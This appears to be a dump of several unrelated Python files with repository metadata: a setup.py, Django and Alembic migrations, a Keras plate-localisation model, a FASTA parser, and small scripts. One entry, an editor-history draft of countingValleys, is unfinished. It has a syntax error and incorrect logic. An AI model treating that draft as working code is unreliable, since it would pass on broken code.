raise ValueError('__version__ is not defined as a string literal')
raise ValueError('could not find __version__')
setup_requires = []
install_requires = [
'nirum >= 0.6.0',
'six',
'Werkzeug >= 0.11, < 1.0',
]
tests_require = [
'flake8-import-order >= 0.12, < 1.0',
'flake8-import-order-spoqa >= 1.0.0, < 2.0.0',
'pytest >= 3.1.2, < 4.0.0',
'pytest-flake8 >= 0.9.1, < 1.0.0',
'requests-mock >= 1.3.0, < 1.4.0',
]
extras_require = {
'tests': tests_require,
}
below35_requires = [
'typing',
]
if 'bdist_wheel' not in sys.argv and sys.version_info < (3, 5):
install_requires.extend(below35_requires)
if tuple(map(int, setuptools_version.split('.'))) < (17, 1):
setup_requires = ['setuptools >= 17.1']
extras_require.update({":python_version=='3.4'": below35_requires})
extras_require.update({":python_version=='2.7'": below35_requires})
else:
extras_require.update({":python_version<'3.5'": below35_requires})
setup(
name='nirum-wsgi',
version=get_version(),
description='Nirum services as WSGI apps',
long_description=readme(),
url='https://github.com/spoqa/nirum-python-wsgi',
bugtrack_url='https://github.com/spoqa/nirum/issues',
author='Nirum team',
license='MIT license',
py_modules=['nirum_wsgi'],
install_requires=install_requires,
setup_requires=setup_requires,
extras_require=extras_require,
entry_points={
'console_scripts': [
'nirum-server = nirum_wsgi:main',
],
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
'Topic :: Software Development :: Code Generators',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Object Brokering',
]
)
|
[
"hong.minhee@gmail.com"
] |
hong.minhee@gmail.com
|
d2dc638524f6e35f32122cb463a2fab665e80b9e
|
5491f4b600f7ecd1d0848d60d7b017e5e407d4c7
|
/servicios/migrations/0001_initial.py
|
c1a04f0e87a898b641e7e4ecdd948ec0fcbb176e
|
[] |
no_license
|
GustavoPMex/web-inventario
|
409456dd356bbfcadd735cc9b8e2aae7605a0e37
|
d0ac36ee791ff0262f9390497da1dd990581a4fd
|
refs/heads/master
| 2023-06-10T10:08:39.029666
| 2021-06-30T23:40:19
| 2021-06-30T23:40:19
| 296,677,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
# Generated by Django 3.0.8 on 2020-08-27 05:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('registration', '0002_remove_profile_correo'),
('cliente', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ServicioModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('descripcion', models.TextField()),
('estado', models.CharField(choices=[('pendiente', 'Pendiente'), ('terminado', 'Terminado')], default='pendiente', max_length=20)),
('creacion', models.DateTimeField(auto_now_add=True)),
('modificacion', models.DateTimeField(auto_now=True)),
('cliente', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='cliente.ClienteModel')),
('tecnico', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='registration.Profile')),
],
options={
'verbose_name': 'Servicio',
'verbose_name_plural': 'Servicios',
'ordering': ['-creacion'],
},
),
]
|
[
"gustavoppymex@gmail.com"
] |
gustavoppymex@gmail.com
|
5735e0eea55f32b3e9089d7447093ed6bc72b14a
|
12f50dac1c5fbdae726e1fe83f31d3e24b9bf0e6
|
/hyperlpr/finemapping_vertical.py
|
11870f31e754c2f46e5e295b173550394247b5ed
|
[] |
no_license
|
HannaRiver/HyperLPR
|
e9611d763a1cda018cdf83a7dd8e9f142c379e11
|
28e900ee666afce738127a7125743dd5d3817865
|
refs/heads/master
| 2021-07-03T19:40:05.802473
| 2017-09-26T01:37:57
| 2017-09-26T01:37:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,326
|
py
|
#coding=utf-8
from keras.layers import Conv2D, Input,MaxPool2D, Reshape,Activation,Flatten, Dense
from keras.models import Model, Sequential
from keras.layers.advanced_activations import PReLU
from keras.optimizers import adam
import numpy as np
import cv2
def getModel():
input = Input(shape=[12, 50, 3]) # change this shape to [None,None,3] to enable arbitraty shape input
x = Conv2D(10, (3, 3), strides=1, padding='valid', name='conv1')(input)
x = PReLU(shared_axes=[1, 2], name='prelu1')(x)
x = MaxPool2D(pool_size=2)(x)
x = Conv2D(16, (3, 3), strides=1, padding='valid', name='conv2')(x)
x = PReLU(shared_axes=[1, 2], name='prelu2')(x)
x = Conv2D(32, (3, 3), strides=1, padding='valid', name='conv3')(x)
x = PReLU(shared_axes=[1, 2], name='prelu3')(x)
x = Flatten()(x)
output = Dense(2)(x)
output = PReLU(name='prelu4')(output)
model = Model([input], [output])
return model
model = getModel()
model.load_weights("./model/model12.h5")
def finemappingVertical(image):
resized = cv2.resize(image,(50,12))
resized = resized.astype(np.float)/255
res= model.predict(np.array([resized]))[0]
res =res*image.shape[1]
res = res.astype(np.int)
image = image[0:35,res[0]+4:res[1]]
image = cv2.resize(image, (int(136), int(36)))
return image
|
[
"455501914@qq.com"
] |
455501914@qq.com
|
0d8b4c467eac9dc88297679578b72230e93a2a6b
|
3d9d193673cd1e3b5c10f824b7bbde6ecaf8e67f
|
/migrations/versions/19e377378700_.py
|
7b481b20b3496e3fd7cf6913effe1fbb82b4202c
|
[] |
no_license
|
n0thingness/cs446-api
|
696b6ef742863eecb9bf63a475654ced547364f8
|
071f0016b2f049d32e5f97466d57aaef0dbb0fe1
|
refs/heads/master
| 2021-09-10T20:34:25.841174
| 2018-04-01T22:20:36
| 2018-04-01T22:20:36
| 125,778,068
| 0
| 0
| null | 2018-04-01T22:20:37
| 2018-03-18T23:42:17
|
Python
|
UTF-8
|
Python
| false
| false
| 831
|
py
|
"""empty message
Revision ID: 19e377378700
Revises: 526868857b1f
Create Date: 2018-03-31 16:36:24.905609
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '19e377378700'
down_revision = '526868857b1f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('matchedTopics', sa.String(length=128), nullable=True))
op.drop_column('users', 'matchedTopic')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('matchedTopic', sa.VARCHAR(length=128), autoincrement=False, nullable=True))
op.drop_column('users', 'matchedTopics')
# ### end Alembic commands ###
|
[
"daniel.briskin@gmail.com"
] |
daniel.briskin@gmail.com
|
805148e822a48ceaa86904ea3e2f94559d77c994
|
623833fd87ca9638780adeef55d1a25525bc2f4e
|
/PRACTICUM--Oral_Microbiome_Browser/read_info_parser.py
|
c3ac13d0fa99aa16fd48de4d8f5d332f9167d46c
|
[] |
no_license
|
BryanChim/Python--Bioinformatics
|
c2816eb34b52237bdded717900331e23c52f4fee
|
ad42909a16127d70c62725ba43b76a12387926e8
|
refs/heads/master
| 2021-01-22T18:28:16.113133
| 2014-11-17T07:07:08
| 2014-11-17T07:07:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
__author__ = 'Bryan'
import re
import argparse
import os
read_dict = {}
parser = argparse.ArgumentParser(description='Get reads and read info')
parser.add_argument('dir_of_fasta_files', type=str, help="directory to input fasta files")
parser.add_argument('output_file', type=argparse.FileType('w'), help="output file of read data")
args = parser.parse_args()
fasta_files = os.listdir(args.dir_of_fasta_files)
for file in fasta_files:
#parser.add_argument('dir_of_fasta_files', type=str, help="directory to input fasta file")
#path_to_current_fasta = ''
# get arguments from parser
fa_in = open(file, 'r')
sample_id_from_fileC = re.search("(.*?)_[ATCG]+?_(?:read|test).*", file)
sample = sample_id_from_fileC.group(1)
#fasta_files = os.listdir(args.dir_of_fasta_files)
for line in fa_in:
line = line.strip()
if (re.match('>.*', line)):
read_infoG = re.match('>.*\|\d+\|(.*?)\|(\d+)\|(\d+)', line)
name = read_infoG.group(1)
length = read_infoG.group(2)
qualityscore = read_infoG.group(3)
print >> args.output_file, name, '\t', sample, '\t', length, '\t', qualityscore
fa_in.close()
args.output_file.close()
#read_dict[name] = (length, qualityscore)
|
[
"bryanchim88@gmail.com"
] |
bryanchim88@gmail.com
|
e8aa570ea9409224e1b9f7a069063dba75362eb2
|
3a8110706a67e111305a943ab7590d94782b0f6a
|
/Matplot/matplot1.py
|
1c7d45579e9e1a44d0f63f6e3d252cf6245c53d6
|
[] |
no_license
|
pawwahn/python_practice
|
41fac14f7107fd8f7c8a33fa7e09561f24bf9376
|
9e6564582abeb9f65c95de86121199939d0ee388
|
refs/heads/master
| 2022-10-04T10:32:49.952690
| 2022-09-15T09:43:18
| 2022-09-15T09:43:18
| 223,134,205
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
import numpy as np
from matplotlib import pyplot as plt
x = np.arange(0,8,0.1)
print(x)
y = np.sin(x)
print(y)
plt.plot(x,y)
plt.show()
|
[
"pavan.skt@gmail.com"
] |
pavan.skt@gmail.com
|
c2b41d27d310d8292e93ff05e9da0d88f018702f
|
4fc120bf5d63dd81916663b8f6ec76e5f9f1f59e
|
/Python/django/books/apps/book/models.py
|
3bf1922d7e8c8c766cb3c951dbe36674859dc051
|
[] |
no_license
|
mjnorona/codingDojo
|
3e8e31853131904922de256f20fd22afaab47194
|
5864d4b5d30f3edca5e20506d24970edc33a8c50
|
refs/heads/master
| 2021-01-23T12:48:24.549638
| 2017-08-22T07:19:57
| 2017-08-22T07:19:57
| 93,197,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Books(models.Model):
title = models.CharField(max_length = 30)
author = models.CharField(max_length = 30)
published_date = models.CharField(max_length = 30)
category = models.CharField(max_length = 30)
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now_add = True)
in_print = models.BooleanField()
|
[
"marcusjeremynorona@gmail.com"
] |
marcusjeremynorona@gmail.com
|
61edd1db2587c0fed59a6ff24856b1d33d604218
|
05322cd9503df62700ebc7cfe4f1dab460e00f45
|
/api/app/v1/resources/queries/models.py
|
3aba61e092d257ed6ffe38b1d0549ec7520ed5e0
|
[] |
no_license
|
duanribeiro/serasa_exercise
|
6650a2ebf1e75c4a14519848c5f315b7b03e3c2f
|
aaea66e8736ce8d99d778a192fafc8115149182c
|
refs/heads/master
| 2021-03-18T03:07:50.914790
| 2020-03-21T12:29:38
| 2020-03-21T12:29:38
| 247,041,284
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 791
|
py
|
import json
from app import mongo
from flask_restplus import abort
from bson.json_util import dumps
from quotes.helpers.auth import AuthEncrypt
class Auth:
@staticmethod
def change_username_password(payload):
username = payload.get('username')
password = payload.get('password')
password = password.encode()
auth = AuthEncrypt(password)
encrypted_password = auth.encrypt_password()
mongo.db.auth.update_one({},
{"$set": {"username": username, "password": encrypted_password}},
upsert=True)
return 'ok'
class Quotes:
@staticmethod
def get_all():
results = mongo.db.quotes.find({}, {"_id": 0})
return json.loads(dumps(results))
|
[
"duan.ribeiro@hotmail.com"
] |
duan.ribeiro@hotmail.com
|
2c0e4f4423d882ea7287ddc5578297c8f614d352
|
61826d69a04391ba99c26e207aa7273055977d59
|
/291project.py
|
65afe78ce0f55dddb254bfe96e7c02a44a8444d8
|
[] |
no_license
|
dbsigurd/291Project1
|
2e4f8c1156eb8c5905694e32ce3dcd198d09e486
|
95a0e237891d52fa1b1c24fc16b500bb57a33dbb
|
refs/heads/master
| 2021-01-15T13:45:06.022482
| 2014-10-27T16:41:38
| 2014-10-27T16:41:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 866
|
py
|
import sys
def enter_prescription():
print("entered prescription")
main()
def medical_test():
main()
def edit_patients():
main()
def search():
main()
def main():
print("########welcome to 291 mini project menu########")
print("###please enter 1 for entering a prescription###")
print("###please enter 2 for entering a medical test###")
print("###please enter 3 for editing a patients info###")
print("###please enter 4 for entering a search query###")
print("####please enter 5 to terminate this program####")
choice =int(input("enter your choice:"))
if (choice == 1):
enter_prescription()
elif (choice == 2):
medical_test()
elif (choice == 3):
edit_patients()
elif (choice == 4):
search()
elif (choice == 5):
sys.exit()
else:
main()
main()
|
[
"dbsigurd@ualberta.ca"
] |
dbsigurd@ualberta.ca
|
1c5b4aba1da2d58321dacc07ca25c917990c0020
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/countingValley_20200625160352.py
|
0822a0291a7f41887b2fe1725ddb17cb8c8fe49a
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 697
|
py
|
def countingValleys(str):
# no need to split cause you can traverse throught a str
# how to differentiate between mountain and valley
# mountain you go up then down
# valley you go down then up
valley = 0
seaLevel = 0
mountain = 0
journey = 0
i = 0
while i < len(str):
if str[i] == "U" and valley < 0:
valley +=1
seaLevel +=1
if str[i] == "D" and seaLevel > 0 :
seaLevel -=1
if str[i]
print("valley-->",valley)
# print("mountain --->",mountain)
i +=1
# print(journey)
countingValleys("UDDDUDUU")
# "UDDDUDUU"
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ebd350a092cb9bb83ac006844baa08e4d6d66277
|
eb500d165a7f4234c8cff93a1b39b99d14b7a9e8
|
/list_github_repos.py
|
a83edc1eca361020b4fa820db6a4ecefc0fe28d8
|
[] |
no_license
|
boredants/list_github_repos
|
a4ef58baad440b7c64c6507dff25e5d1a1598c31
|
6014eec27c1732f5aca3a5b4ef321e020a7892c2
|
refs/heads/master
| 2020-12-01T22:29:40.237480
| 2019-12-29T19:15:01
| 2019-12-29T19:15:01
| 230,792,756
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 622
|
py
|
import requests
print("\n################################")
print("# LIST GITHUB REPOS FOR A USER #")
print("################################")
while True:
githubUser = input("\nEnter a username or 'q' to quit: ")
print()
if githubUser == 'q':
print("Exiting\n")
break
else:
url = "https://api.github.com/users/" + githubUser + "/repos"
try:
j = requests.get(url).json()
for i in j:
print("{0:30}: {1}".format(i.get('name'), i.get('description')))
except Exception as e:
print("That user doesn't exist.")
|
[
"noreply@github.com"
] |
boredants.noreply@github.com
|
7026f58d5b2a95af765eb6ac76900dd21f59464a
|
a780e9ce2b33fd00e15dd66a826c6eb8e0afbd13
|
/tuition/migrations/0009_post_user.py
|
dce735ae6ae295f283e225d6f918ef1aa292fcfd
|
[] |
no_license
|
litonbairaggi/djtestproject
|
dfa2ea40557dd37fc705f80b9b20115b6d9328a9
|
c9504a4aaa3f5638087f4ce976916b21bd290130
|
refs/heads/master
| 2023-04-27T11:26:52.414889
| 2021-05-18T15:41:06
| 2021-05-18T15:41:06
| 366,428,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 592
|
py
|
# Generated by Django 3.1.7 on 2021-05-11 21:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tuition', '0008_post_medium'),
]
operations = [
migrations.AddField(
model_name='post',
name='user',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"litonovi2013@gmail.com"
] |
litonovi2013@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.